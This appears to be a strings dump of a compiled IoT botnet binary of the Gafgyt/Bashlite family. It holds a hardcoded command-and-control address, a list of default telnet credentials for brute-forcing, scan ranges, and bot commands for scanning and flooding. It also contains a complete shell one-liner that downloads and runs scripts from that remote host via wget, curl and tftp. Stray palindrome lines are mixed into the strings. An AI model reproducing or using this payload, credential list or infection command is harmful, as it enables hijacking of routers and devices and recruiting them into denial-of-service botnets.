PTRh
QVh|
</v	
<suB
<du0
<xu0
<Xu0
<uu-
<cuJ
<rt	
<ru9
;E }
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RQSPVW
[^_]
[^_]
SVPh\
SVPh\
[^_]
wget
 -s 
-U "f
[^_]
WVSQ
< t	
< t	
s/;%
\$ ;
S\ZY
UWVS
RRPS
D$8P
L$8Q
)l$(
9D$(s
\$(iD$
 @tH
;\$(
t!HuE
K`Uh
SPShi
|$81
t$9{
UWVS
\$$S
YXSh
Y^Sh
[^_]
 Y[[
s/;%
UWVS
sQQUV
D$$Pj
[^_]
s/;%
D$pQQjXPR
UWVS
VUPS
[^_]
PPVW
tq;5
ti;5
ta;5
tYPPV
UWVS
[^_]
[^_]
s/;%
UWVS
[^_]
UWVS
[^_]
UWVS
PPUW
t%WW
t$0U
[^_]
\$4Pj
t$0Pj
t$<VS
s/;%
u*Ph
PPSj
D$$Q
D$,Pj
UWVS
t$,U
[^_]
t$ V
;K s
s/;%
Z<XZ[
P<Y[[
Z<XZ[
UWVS
[^_]
s/;%
UWVS
t$@P
D$$Pj
[^_]
[^_]
s/;%
UWVS
[^_]
WVS1
\$ S
s/;%
t#PP
T$4XZj
UWVS
[^_]
s/;%
UWVS
[^_]
u PPj
D$ P
PRQW
T$(S
T$(S
T$$S
PPSV
UWVS
[^_]
UWVS
tXPj
t$(W
PSVW
	USVW
[^_]
|$4h@
Do nine men interpret Nine men I nod
t29{
D$$PV
 [^_
<wt#
D$8P
QQSP
D$(P
t$Ph 
t$(V
UWVS
[^_]
QPRS
^8PSh)
t$,V
UWVS
t$$S
[^_]
UWVS
T$`~
D$(%
WVPR
$VRP
?0u+
D$ P
Eleele
PQRR
QQRW
[^_]
tP~N
t@~>=
UWVS
<$u0
\$L9
~	<mtN
:*u4
T$X:
L$pE
D$`P
L$p)
\[^_]
AIt	
UWVS
ZY[^_]
UWVS
D$gP
[^_]
\$HPh
D$)P
WVS1
D$ P
D$ Pj
D$ Pj
xAPPSh 
UWVS
\$Th
D$8P
T$ !
#t$ 
2#D$ 
D$8P
[^_]
UWVS
[^_]
UWVS
u=9J
;X,tQ
[^_]
UWVS
u<9J
SSPQ)
[^_]
uXRh
,h H
\$ S
D$,Ph8H
XZh8H
XZh8H
UWVS
[^_]
UWVS
[^_]
UWVS
;<$|
XZKy
[^_]
UWVS
[^_]
D$ [Xj
}/QQ
uJQQj
t$@h 
D$4j
UWVS
 <xu
(<`v
}/C;T$
D$,!
[^_]
t$$h
UWVS
u%WWSS
ZYSS
[^_]
yPPj
PPSh
UWVS
Qjxj
D$ P
t@;D$xu
uVPPh
PPSj
t$Dj
D$<PR
t$(j
UWVS
\$89
[^_]
UWVS
^8WSh)
D$(P
D$(P
[^_]
UWVS
)\$(
[^_]
UWVS
<rt>
Borrow or rob
<wt7f
<at/
E4tmPh
t$(V
[^_]
UWVS
PVUR
whQWUR
[^_]
[^_]
UWVS
[^_]
UWVS
e<au
u*z(
u?z=
D$Pp
|$6f
l$61
D$(RP
} Pj
D$'g
D$'f)
D$\p
|$d9
T$`)
L$t1
|$'fto
[^_]
D$ P
D$ P
UWVS
^8PSh)
[^_]
QQWS
'RRWS
u PPj
t%9~
[^_]
UWVS
D$`f
t$lP
T$`f
pQQj
Ph!T
[^_]
LPj 
F,QQPW
P SP
WWSQ
[^_]
u-QQj
D$(P
D$,3D$(P
D$$QQPh
|$0f
D$ P
 [^_
t9PP
t&PP
u\PPSV
tLPP
t9PP
t&PP
QQPV
t_PP
C Qj
D$8XZ
C Qj
C Qj
C Qj
C Qj
C Qj
D$8XZ
UWVS
"QQV
RRPS
PVWS
[^_]
UWVS
 ;l$
[^_]
UWVS
XZWU
[^_]
UWVS
t$DVW
[^_]
UWVS
[^_]
UWVS
\$ S
UQhd
!RRWS
PPWS
D$ P
[^_]
D$ P
uJQQ
t	r4
UWVS
l$8WV
[^_]
[^_]
;D$(ww
t	r@
J@t]
UWVS
6;t$
t	r:
[^_]
[^_]
UWVS
.u5A
Z[^_]
UWVS
t$xSU
t$xj
t$hW
\$DS
D$TPh
E$VRWP
uZRj
t$,U
L[^_]
UWVS
t$8R
$9D$
t$8S
\$0PPj
[^_]
UWVS
^8PSh)
D$(PV
x6RW
D$(PV
[^_]
WVS1
^8QSh)
UWVS
L$HAC
t/r'
9t$(t
T$$)D$
tKr9
$9,$t
$9<$t
L$HAC
,[^_]
WVS1
PPj@j
|$$W
YXSW
 [^_
tLPP
t9PP
QQh/
UWVS
[^_]
UWVS
Qj VS
[^_]
D$<P
D$8P
UWVS
F;t$(r
[^_]
UWVS
>;|$,w
t$09
UQVj
[^_]
UWVS
D$7h
D$<XZj
\$PS
D$$;
}3Ph
t$(j
D$LPU
D$,9
uOQh
K9\$$}
PPVU
;\$d|
D$tP
T$|RW
G$;G wn
9D$xu,
t$4C;\$h}
T$H^_j
uDQh
K9\$$}
D$(@
tMQh
[^_]
UWVS
t>QQh
\$$S
[^_]
t$4j
t$8j
UWVS
t$$f
T$ 1
[^_]
^8QSh)
UWVS
[^_]
PVWS
UWVS
u}QQh-
DPPh-
_XSV
[^_]
ZYSP
UWVS
PPhf
PPWS
[^_]
UWVS
t+F1
D$ PU
[^_]
UWVS
D$(P
yQQVh
u+Rj
D$$P
,[^_]
UWVS
|$-1
+<0u$
D<,.f
\$7S
<[^_]
UWVS
Pj j
D$HP
D$t)
;D$|v
!WWR
[^_]
UWVS
[^_]
UWVS
PPj#
u,PP
t$4U
[^_]
t$(j
UWVS
t$$P
[^_]
UWVS
YRRj.W
D$()
[^_]
UWVS
G;|$,s\PS
[^_]
163.180.116.229:666
root
admin
Tacocat
guest
telnet
cisco
netgear
oracle
support
cusadmin
1234
raspberry
password
alpine
maxided
(null)
buf: %s
/bin/sh
/proc/cpuinfo
BOGOMIPS
PING
:>%$#
119.93.%d.%d
125.27.%d.%d
180.180.%d.%d
119.92.%d.%d
119.91.%d.%d
113.53.%d.%d
125.25.%d.%d
125.26.%d.%d
%d.%d.%d.%d
ogin:
assword:
ncorrect
shell
cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; wget http://163.180.116.229/gtop.sh || curl -O http://163.180.116.229/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; busybox tftp 163.180.116.229 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g 163.180.116.229; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf gtop.sh tftp1.sh tftp2.sh;exit
/bin/busybox;echo -e '\147\141\171\146\147\164'
ulti-call
cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; wget http://0.0.0.0/gtop.sh || curl -O http://0.0.0.0/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; busybox tftp 0.0.0.0 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g 0.0.0.0; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf gtop.sh tftp1.sh tftp2.sh;exit
REPORT %s:%s:%s
gayfgt
Failed opening raw socket.
Failed setting raw headers mode.
Invalid flag "%s"
 > /dev/null 
PONG!
GETLOCALIP
Beeb
My IP: %s
SCANNER
SCANNER ON | OFF
HTTP
KILLATTK
LOLNOGTFO
8.8.8.8
/proc/net/route
	00000000	
ZEKROM
BUILD %s
BUILD %s
PONG
%s 2>&1
0.9.30
/bin/sh
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Degas are we not drawn onward no In union drawn onward to new eras aged
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
A Santa lives evil at NASA
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
/dev/null
L(knN
 Ainf
clntudp_create: out of memory
bad auth_len gid %d str %d auth %d
xdr_string: out of memory
xdr_bytes: out of memory
__get_myaddress: socket
__get_myaddress: ioctl (get interface configuration)
__get_myaddress: ioctl
Cannot register service
xdr_array: out of memory
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
%s%s%m
RPC: (unknown error code)
%s: 
; errno = %s
; low version = %lu, high version = %lu
; why = 
(unknown authentication error - %d)
; s1 = %lu, s2 = %lu
Authentication OK
Invalid client credential
Server rejected credential
Invalid client verifier
Server rejected verifier
Client credential too weak
Invalid server verifier
Failed (unspecified error)
RPC: Success
RPC: Can't encode arguments
RPC: Can't decode result
RPC: Unable to send
RPC: Unable to receive
RPC: Timed out
RPC: Incompatible versions of RPC
RPC: Authentication error
RPC: Program unavailable
RPC: Program/version mismatch
RPC: Procedure unavailable
RPC: Server can't decode arguments
RPC: Remote system error
RPC: Unknown host
RPC: Unknown protocol
RPC: Port mapper failure
RPC: Program not registered
RPC: Failed (unspecified error)
0123456789abcdef
/etc/hosts
/etc/config/hosts
CAk[S
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
God A red nugget A fat egg under a dog
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
alula
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.got.plt
.data
.bss
.comment
